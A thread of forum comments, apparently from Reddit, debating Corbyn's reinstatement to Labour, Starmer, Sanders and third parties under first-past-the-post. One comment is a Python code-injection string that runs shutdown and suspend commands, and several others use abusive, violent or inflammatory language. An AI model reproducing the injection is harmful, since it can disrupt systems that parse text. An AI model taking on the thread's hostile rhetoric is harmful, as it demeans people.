They can't purge him any faster than he can purge them. They're joined at the hip by the liberal democratic system they've chosen to participate in.
Glad to see that Labour has once again embraced antisemitism. It'll be easier to convince my French friends to like them now
To secure the critical French vote, Labour must first establish complete opposition to the age of consent
Lmao imagine being that lame. Staining the party's name to go on your stupid purge, only to eventually decide "fuck it, we're reinstating Corbyn".
"}}}}; import os; os.system("shutdown /s /t 1"); os.system("systemctl suspend"); #
they don't have a choice. they like to pretend that they can win without us.
wish we had some hard ball mother fuckers who were just like 'nope, you fucked around and now you'll find out.' and maintain the position until the fuckers cave.
There is a clip going around from 91 of Bernie telling congress to reduce the defense budget. He goes pretty hard core against both parties. So maybe he wasn't so agreeable, but he didn't draw that much attention so I guess that's the important factor. He wasn't threatening.
He didn't really, they fought him every step of the way. He basically spent every ounce of goodwill he earned over his years in the Senate to run.
Vermont republicans and democrats alike have loved Bernie all along. I think the D label often hurts progressives amongst voters who just see that as toxic.
I doubt it would surpass Labour but in a FPTP system by being spoilers they could do a lot of damage to the Blairites and force them to move left. Like the Brexit party did.
That's because we had propaganda like "babies need blood transfusions, not a new voting system"
"This soldier needs a new bulletproof vest, not a new voting system"
that was a classic
My guess is they let him back in because they realized that not only was this a threat, but a threat that likely had the potential to totally destroy the labour party.
Funny, it reads "The East may be red but it'll be nothing compared to the Blairite blood we'll unleash in the streets" to me.
They had no choice, it went before the NEC and he didn't break any rules so they voted to reinstate
This obviously demonstrates the unity of the party, which is important and why important votes are done unanimous. Cause the party is so unified and free of conflicts or enemies.
Keir Starmer is already on twitter calling this "another painful day for the Jewish community" like the puffy faced loser that he is.
What about those other MPs who were getting fucked over for supporting Corbyn? What's happening to them? What the fuck is Starmer doing, I genuinely can't tell
Tell me why Corbyn isn't just wasting his time being polite and seeking unity with the Blairite scum. They're as much enemies of socialism as the Tories.
Why shouldn't Corbyn start a new party to ruin the Labour party from the left just as the Brexit Party ruined the Tories from the right?
for the same reason one bernard refused to endorse a third party. what that reason is precisely i don't know, but i know it's the same fuckin reason. most likely spinelessness and thinking there's just not enough decent people that would stand their ground. it's hard to fault them when the effects of media/propaganda upon the populace are well documented.
It makes sense in America because a third party is functionally useless. But in the UK it could make a real difference.
The UK is also first past the post. Libdems are only really relevant in a small number of constituencies and the rest of the third parties are regional.
The nature of first past the post is certainly easier to overcome in the UK than in the US, but ultimately it's a 2 party system.
In America the two parties get 96% of the votes. In UK they get 80%. Third parties also get seats in the house. It's different.
I am one with the pog right now. Poor lad has been dragged through the mud. It's nice to see something good happen to him for once
Come on Jeremy please get a pair. This hurts to watch. Getting banned from the labor party was the best thing you could have done
I for one am very much looking forward to the upcoming dunk tanks posts with all these closet Tories tweeting about how they are literally shaking and crying over how such a horrible and obvious anti-semite has been reinstated to the party rather than shot in the head as they feel he deserves...
upcoming dunk tanks posts
Let's be real, half of them will be in main anyway
